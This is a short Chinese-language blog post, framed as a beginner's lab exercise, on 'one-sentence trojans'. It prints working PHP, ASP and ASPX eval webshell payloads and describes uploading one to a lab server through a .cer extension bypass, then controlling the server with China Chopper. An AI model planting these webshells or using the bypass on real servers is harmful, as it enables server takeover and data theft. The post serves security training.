一句话木马:初识木马练习
一句话木马:
不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的。
一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取。
php木马: <?php @eval($_POST['password']);?>
asp是: <%eval request ("password")%>
aspx是: <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%>
以asp为例子:
- eval:执行
- request:从用户那里,获得里面的信息
- password:我们与木马相约好的密码。
这就是一句话木马
什么是webshell
就是网络的人机交互界面。
拿shell就是拿去web服务器的权限。
靶场练习,上传一句话木马到服务器,并摄取信息:
制作一句话木马文件:
这样,我们的文件就制作好了。
然后随便找一个地方上传,结果发现,不允许上传。
cer文件和asp文件都指向的是asp.dll 所以这两个文件都可以被解析。
但是这里怕文件太小了,我们在文件里面加点乱七八糟的东西
上传,记住路径
打开路径看是否上传成功
乱七八糟也不知道是啥,但是就似乎上传成功了
打开中国菜刀,远程连接,入侵服务器
类型选择ASP
添加好后双击打开,就可以看见里面的内容了
路漫漫其修远兮,吾将上下而求索
本文来自博客园,作者:{Zeker62},转载请注明原文链接:https://www.cnblogs.com/Zeker62/p/15167818.html